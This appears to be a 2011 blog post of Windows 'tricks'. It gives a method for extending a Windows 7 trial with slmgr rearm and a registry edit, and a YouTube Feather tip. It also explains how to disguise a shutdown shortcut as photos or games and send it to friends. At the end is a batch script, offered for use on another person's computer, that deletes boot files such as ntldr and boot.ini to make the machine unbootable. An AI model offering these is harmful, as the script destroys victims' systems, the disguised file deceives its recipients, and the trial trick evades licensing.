Friday, August 19, 2011

Genuine Windows 7 For 1 Year Without Any Crack Or Key

You can use a trial version of windows 7 without using cracks or keys. By this way you can not only avoid piracy but also use the original windows for free.

After you have your trial version of windows 7 installed in your computer, just follow the below steps:

Firstly you need to check how many days are left for your windows to expire so for that click on start then right click on computer and click on properties.

Now at the bottom of the windows which will open you will see the days left under the heading Windows activation.

Now on the last day of your windows go to start and type command in the search box and right click on command prompt and click on run as administrator.

Now in the command prompt type slmgr -rearm and press enter.

After some seconds you will get a dialog box open up showing that the command completed successfully.

Now this will reset your windows trial for more 30 days. You can repeat the process 3 times i.e. you will get 120 days. Now to use this trick 8 times more so that you can use windows for another 240 days here are the steps:

Click on start and type regedit and click on regedit and then click on yes (if asked). If you think that you may make some mistake while following the steps below then it is better to backup your registry which you read from here.

Now navigate to HKEY_LOCAL_MACHINE =>SOFTWARE =>Microsoft => Windows NT =>CurrentVersion => SoftwareProtectionPlatform
Now in the right side double click on SkipRearm and change it's value from 0 to 1 and click on ok.

Now you can use windows for 120 days before editing registry and 240 days after editing it. So in total you can use the windows for 360 days i.e 1 year.

If you want to make this process automatic then:
Open notepad and there type slmgr -rearm and save it as anything.bat
Now schedule this file to run automatically using windows Task Scheduler on a particular date i.e. after every 30 days.

Make Youtube Faster on Slow Internet connections

            Youtube is having a alternative version called Youtube Feather, it increase youtube Site Speed so videos will be much faster and thus helpful for slow internet connections or hand held Devices.To achieve faster speed Youtube disable many not so useful features like search suggestions, posting comments etc.


Once you activate Youtube Feather you will see an option to switch back to regular Youtube in the right sidebar.I am using Youtube Feather for quite sometime and the thing I love the most about Feather is that it keeps things simple and clean. It's not bogged down with icons or comments or all that other stuff most people just don't care about.

To Enable Youtube Feather for your Computer just visit Youtube Feather page and click on "Join the Feather Beta" Link.

Shutdown your friends PC while chatting

Step 1: Make a shortcut on desktop by Right click on desktop, and then go to New, then Shortcut.

Step 2: Then in the "type location of the item" type: %windir%\system32\shutdown.exe -s -t 60 -c "Click It"
 Here 60 in time duration in seconds after which the computer will shutdown. You can change it to any.
Here “Click It” is the text which will appear on shutdown notice window. You can also change it.
Step 3: Click on next and given a name click on finish.

Step 4: Now right click on the shortcut and Change its name and icon to something interesting.

Step 5: Now to send it to some one you need to make a compressed file by right clicking on the desktop, go to New, Compressed file (zipped). Then Zipped folder will appear.

Step 6: Drag your shutdown virus into this zipped folder and rename it something interesting like photos/ games etc.

Step 7: Now send it to your friends and shutdown their pc while chatting.

Hacking Truth: This is not an actual virus. It is just the shortcut of SHUTDOWN. This trick will not harm your PC. So when your friend will restart his/her PC it will restart normally.

Note: When the timer will start, it can't be stopped even by deleting the file which you have created.

Shutdoen a Computer FOREVER

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste it. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.




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